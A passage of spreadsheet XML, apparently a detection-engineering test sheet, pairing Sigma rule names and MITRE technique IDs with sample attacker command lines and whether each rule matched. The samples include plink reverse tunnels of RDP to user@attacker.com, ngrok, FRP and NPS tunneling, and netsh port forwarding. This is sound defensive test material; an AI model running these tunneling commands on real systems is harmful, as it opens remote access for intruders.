        <v>0</v>
      </c>
    </row>
    <row r="814" ht="15.75" customHeight="1" s="42">
      <c r="A814" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B814" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C814" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D814" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E814" s="41" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=3389 listenaddress=192.0.2.10 connectport=3389 "connectaddress"=192.0.2.10</t>
        </is>
      </c>
      <c r="F814" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G814" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H814" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I814" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J814" s="41" t="n"/>
      <c r="K814" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="815" ht="15.75" customHeight="1" s="42">
      <c r="A815" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B815" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_frp</t>
        </is>
      </c>
      <c r="C815" s="41" t="inlineStr">
        <is>
          <t>PUA - Fast Reverse Proxy (FRP) Execution</t>
        </is>
      </c>
      <c r="D815" s="41" t="inlineStr">
        <is>
          <t>32410e29-5f94-4568-b6a3-d91a8adad863</t>
        </is>
      </c>
      <c r="E815" s="41" t="inlineStr">
        <is>
          <t>C:\\Program Files\\frp\\frpc.exe -c "C:\\Program Files\\frp\\frpc.ini"</t>
        </is>
      </c>
      <c r="F815" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G815" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H815" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I815" s="41" t="n"/>
      <c r="J815" s="41" t="n"/>
      <c r="K815" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="816" ht="15.75" customHeight="1" s="42">
      <c r="A816" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B816" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_frp</t>
        </is>
      </c>
      <c r="C816" s="41" t="inlineStr">
        <is>
          <t>PUA - Fast Reverse Proxy (FRP) Execution</t>
        </is>
      </c>
      <c r="D816" s="41" t="inlineStr">
        <is>
          <t>32410e29-5f94-4568-b6a3-d91a8adad863</t>
        </is>
      </c>
      <c r="E816" s="41" t="inlineStr">
        <is>
          <t>C:\\Program Files\\frp\\frpc.exe --config C:\\Program Files\\frp\\frpc.ini</t>
        </is>
      </c>
      <c r="F816" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G816" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H816" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I816" s="41" t="n"/>
      <c r="J816" s="41" t="n"/>
      <c r="K816" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="817" ht="15.75" customHeight="1" s="42">
      <c r="A817" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B817" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_frp</t>
        </is>
      </c>
      <c r="C817" s="41" t="inlineStr">
        <is>
          <t>PUA - Fast Reverse Proxy (FRP) Execution</t>
        </is>
      </c>
      <c r="D817" s="41" t="inlineStr">
        <is>
          <t>32410e29-5f94-4568-b6a3-d91a8adad863</t>
        </is>
      </c>
      <c r="E817" s="41" t="inlineStr">
        <is>
          <t>C:\\Program Files\\frp\\frpc.exe -c C:/Program Files/frp/frpc.ini</t>
        </is>
      </c>
      <c r="F817" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G817" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H817" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I817" s="41" t="n"/>
      <c r="J817" s="41" t="n"/>
      <c r="K817" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="818" ht="15.75" customHeight="1" s="42">
      <c r="A818" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B818" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C818" s="41" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D818" s="41" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E818" s="41" t="inlineStr">
        <is>
          <t>npc.exe -server=\\\"\\\" -vkey=\\\"test\\\" -password=\\\"pass\\\" -config=npc</t>
        </is>
      </c>
      <c r="F818" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G818" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H818" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I818" s="41" t="n"/>
      <c r="J818" s="41" t="n"/>
      <c r="K818" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="819" ht="15.75" customHeight="1" s="42">
      <c r="A819" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B819" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C819" s="41" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D819" s="41" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E819" s="41" t="inlineStr">
        <is>
          <t>npc.exe --server test --vkey test --password pass -config=npc</t>
        </is>
      </c>
      <c r="F819" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G819" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H819" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I819" s="41" t="n"/>
      <c r="J819" s="41" t="n"/>
      <c r="K819" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="820" ht="15.75" customHeight="1" s="42">
      <c r="A820" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B820" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C820" s="41" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D820" s="41" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E820" s="41" t="inlineStr">
        <is>
          <t>npc.exe -server test -vkey test -password pass</t>
        </is>
      </c>
      <c r="F820" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G820" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H820" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I820" s="41" t="n"/>
      <c r="J820" s="41" t="n"/>
      <c r="K820" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="821" ht="15.75" customHeight="1" s="42">
      <c r="A821" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B821" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C821" s="41" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D821" s="41" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E821" s="41" t="inlineStr">
        <is>
          <t>npc.exe -password pass -vkey test -server test -config=npc</t>
        </is>
      </c>
      <c r="F821" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G821" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H821" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I821" s="41" t="n"/>
      <c r="J821" s="41" t="n"/>
      <c r="K821" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="822" ht="15.75" customHeight="1" s="42">
      <c r="A822" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B822" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C822" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D822" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E822" s="41" t="inlineStr">
        <is>
          <t>plink.exe "-R" 3389:localhost:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F822" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G822" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H822" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I822" s="41" t="n"/>
      <c r="J822" s="41" t="n"/>
      <c r="K822" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="823" ht="15.75" customHeight="1" s="42">
      <c r="A823" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B823" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C823" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D823" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E823" s="41" t="inlineStr">
        <is>
          <t>plink.exe	-R	3389:localhost:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F823" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G823" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H823" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I823" s="41" t="n"/>
      <c r="J823" s="41" t="n"/>
      <c r="K823" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="824" ht="15.75" customHeight="1" s="42">
      <c r="A824" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B824" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C824" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D824" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E824" s="41" t="inlineStr">
        <is>
          <t>plink.exe -R3389:localhost:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F824" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G824" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H824" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I824" s="41" t="n"/>
      <c r="J824" s="41" t="n"/>
      <c r="K824" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="825" ht="15.75" customHeight="1" s="42">
      <c r="A825" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B825" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C825" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D825" s="41" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E825" s="41" t="inlineStr">
        <is>
          <t>plink.exe -R 3389:localhost:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F825" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G825" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H825" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I825" s="41" t="n"/>
      <c r="J825" s="41" t="n"/>
      <c r="K825" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="826" ht="15.75" customHeight="1" s="42">
      <c r="A826" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B826" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C826" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D826" s="41" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E826" s="41" t="inlineStr">
        <is>
          <t>plink.exe -R 3389:127.0.0.2:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F826" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G826" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H826" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I826" s="41" t="n"/>
      <c r="J826" s="41" t="n"/>
      <c r="K826" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="827" ht="15.75" customHeight="1" s="42">
      <c r="A827" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B827" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C827" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D827" s="41" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E827" s="41" t="inlineStr">
        <is>
          <t>plink.exe -R 3389:[::1]:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F827" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G827" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H827" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I827" s="41" t="n"/>
      <c r="J827" s="41" t="n"/>
      <c r="K827" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="828" ht="15.75" customHeight="1" s="42">
      <c r="A828" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B828" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C828" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D828" s="41" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E828" s="41" t="inlineStr">
        <is>
          <t>plink.exe	-P	443 -R 3389:127.0.0.1:3389 user@attacker.com</t>
        </is>
      </c>
      <c r="F828" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G828" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H828" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I828" s="41" t="n"/>
      <c r="J828" s="41" t="n"/>
      <c r="K828" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="829" ht="15.75" customHeight="1" s="42">
      <c r="A829" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B829" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C829" s="41" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D829" s="41" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E829" s="41" t="inlineStr">
        <is>
          <t>3proxy.exe -i 127.0.0.1</t>
        </is>
      </c>
      <c r="F829" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G829" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H829" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I829" s="41" t="n"/>
      <c r="J829" s="41" t="n"/>
      <c r="K829" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="830" ht="15.75" customHeight="1" s="42">
      <c r="A830" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B830" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C830" s="41" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D830" s="41" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E830" s="41" t="inlineStr">
        <is>
          <t>3proxy.exe -p 8080 -i 127.0.0.1</t>
        </is>
      </c>
      <c r="F830" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G830" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H830" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I830" s="41" t="n"/>
      <c r="J830" s="41" t="n"/>
      <c r="K830" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="831" ht="15.75" customHeight="1" s="42">
      <c r="A831" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B831" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C831" s="41" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D831" s="41" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E831" s="41" t="inlineStr">
        <is>
          <t>3proxy.exe -i ${localhost} -p 8080</t>
        </is>
      </c>
      <c r="F831" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G831" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H831" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I831" s="41" t="n"/>
      <c r="J831" s="41" t="n"/>
      <c r="K831" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="832" ht="15.75" customHeight="1" s="42">
      <c r="A832" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B832" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C832" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D832" s="41" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E832" s="41" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {C:\\Users\\Public\\ngrok\\ngrok.exe config add-authtoken N/A | Out-Null; Start-Job -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe tcp 3389 } | Out-Null; Start-Sleep -s 5; Stop-Job -Name Job1 | Out-Null}</t>
        </is>
      </c>
      <c r="F832" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G832" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H832" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I832" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution (ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31)</t>
        </is>
      </c>
      <c r="J832" s="41" t="n"/>
      <c r="K832" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="833" ht="15.75" customHeight="1" s="42">
      <c r="A833" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B833" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C833" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D833" s="41" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E833" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {C:\\Users\\Public\\ngrok\\ngrok.exe config add-authtoken N/A | Out-Null; Start-Job -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe tcp 3389 } | Out-Null; Start-Sleep -s 5; Stop-Job -Name Job1 | Out-Null}"</t>
        </is>
      </c>
      <c r="F833" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G833" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H833" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I833" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution (ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31); PUA - Ngrok Execution (ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31)</t>
        </is>
      </c>
      <c r="J833" s="41" t="n"/>
      <c r="K833" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="834" ht="15.75" customHeight="1" s="42">
      <c r="A834" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B834" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C834" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D834" s="41" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E834" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {C:\\Users\\Public\\ngrok\\ngrok.exe --config=.yml start --all tcp 3389}"</t>
        </is>
      </c>
      <c r="F834" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G834" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H834" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I834" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution (ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31); PUA - Ngrok Execution (ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31)</t>
        </is>
      </c>
      <c r="J834" s="41" t="n"/>
      <c r="K834" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="835" ht="15.75" customHeight="1" s="42">
      <c r="A835" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B835" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C835" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D835" s="41" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E835" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {$env:ngrok_path='C:\\Users\\Public\\ngrok\\ngrok.exe'; &amp; $env:ngrok_path config add-authtoken N/A | Out-Null; Start-Job -ScriptBlock { &amp; $env:ngrok_path tcp 3389 } | Out-Null; Start-Sleep -s 5; Stop-Job -Name Job1 | Out-Null}"</t>
        </is>
      </c>
      <c r="F835" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G835" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H835" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I835" s="41" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution (ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31); PUA - Ngrok Execution (ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31)</t>
        </is>
      </c>
      <c r="J835" s="41" t="n"/>
      <c r="K835" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="836" ht="15.75" customHeight="1" s="42">
      <c r="A836" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B836" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_rdp_tunneling</t>
        </is>
      </c>
      <c r="C836" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH</t>
        </is>
      </c>
      <c r="D836" s="41" t="inlineStr">
        <is>
          <t>f7d7ebd5-a016-46e2-9c54-f9932f2d386d</t>
        </is>
      </c>
      <c r="E836" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c ssh.exe -L 1234:127.0.0.1:33^89 user@remote-host</t>
        </is>
      </c>
      <c r="F836" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G836" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H836" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I836" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH (f7d7ebd5-a016-46e2-9c54-f9932f2d386d); Potential Remote Desktop Tunneling (8a3038e8-9c9d-46f8-b184-66234a160f6f)</t>
        </is>
      </c>
      <c r="J836" s="41" t="n"/>
      <c r="K836" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="837" ht="15.75" customHeight="1" s="42">
      <c r="A837" s="41" t="inlineStr">
        <is>
          <t>t1132.001</t>
        </is>
      </c>
      <c r="B837" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_decode_gzip</t>
        </is>
      </c>
      <c r="C837" s="41" t="inlineStr">
        <is>
          <t>Gzip Archive Decode Via PowerShell</t>
        </is>
      </c>
      <c r="D837" s="41" t="inlineStr">
        <is>
          <t>98767d61-b2e8-4d71-b661-e36783ee24c1</t>
        </is>
      </c>
      <c r="E837" s="41" t="inlineStr">
        <is>
          <t>powershell -Command "Add-Type -AssemblyName System.IO.Compression; $stream = New-Object IO.Compression.GZipStream($file, [IO.Compression.CompressionMode]::Decompress); $stream.Read($data, 0, $data.Length)"</t>
        </is>
      </c>
      <c r="F837" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G837" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H837" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I837" s="41" t="inlineStr">
        <is>
          <t>Gzip Archive Decode Via PowerShell (98767d61-b2e8-4d71-b661-e36783ee24c1); Gzip Archive Decode Via PowerShell (98767d61-b2e8-4d71-b661-e36783ee24c1)</t>
        </is>
      </c>
      <c r="J837" s="41" t="n"/>
      <c r="K837" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="838" ht="15.75" customHeight="1" s="42">
      <c r="A838" s="41" t="inlineStr">
        <is>
          <t>t1132.001</t>
        </is>
      </c>
      <c r="B838" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_decode_gzip</t>
        </is>
      </c>
      <c r="C838" s="41" t="inlineStr">
        <is>
          <t>Gzip Archive Decode Via PowerShell</t>
        </is>
      </c>
      <c r="D838" s="41" t="inlineStr">
        <is>
          <t>98767d61-b2e8-4d71-b661-e36783ee24c1</t>
        </is>
      </c>
      <c r="E838" s="41" t="inlineStr">
        <is>
          <t>powershell -Command "[System.IO.Compression.GZipStream]::new($file, [System.IO.Compression.CompressionMode]::Decompress)"</t>
        </is>
      </c>
      <c r="F838" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G838" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H838" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I838" s="41" t="inlineStr">
        <is>
          <t>Gzip Archive Decode Via PowerShell (98767d61-b2e8-4d71-b661-e36783ee24c1); Gzip Archive Decode Via PowerShell (98767d61-b2e8-4d71-b661-e36783ee24c1)</t>
        </is>
      </c>
      <c r="J838" s="41" t="n"/>
      <c r="K838" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="839" ht="15.75" customHeight="1" s="42">
      <c r="A839" s="41" t="inlineStr">
        <is>
          <t>t1132.001</t>
        </is>
      </c>
      <c r="B839" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_decode_gzip</t>
        </is>
      </c>
      <c r="C839" s="41" t="inlineStr">
        <is>
          <t>Gzip Archive Decode Via PowerShell</t>
        </is>
      </c>
      <c r="D839" s="41" t="inlineStr">
        <is>
          <t>98767d61-b2e8-4d71-b661-e36783ee24c1</t>
        </is>
      </c>
      <c r="E839" s="41" t="inlineStr">
        <is>
          <t>powershell -c "&amp; { Add-Type -AssemblyName System.IO.Compression; $stream = New-Object IO.Compression.GZipStream($file, [IO.Compression.CompressionMode]::Decompress); $stream.Read($data, 0, $data.Length) }"</t>
        </is>
      </c>
      <c r="F839" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G839" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H839" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I839" s="41" t="inlineStr">
        <is>
          <t>Gzip Archive Decode Via PowerShell (98767d61-b2e8-4d71-b661-e36783ee24c1); Gzip Archive Decode Via PowerShell (98767d61-b2e8-4d71-b661-e36783ee24c1)</t>
        </is>
      </c>
      <c r="J839" s="41" t="n"/>
      <c r="K839" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="840" ht="15.75" customHeight="1" s="42">
      <c r="A840" s="41" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B840" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C840" s="41" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D840" s="41" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E840" s="41" t="inlineStr">
        <is>
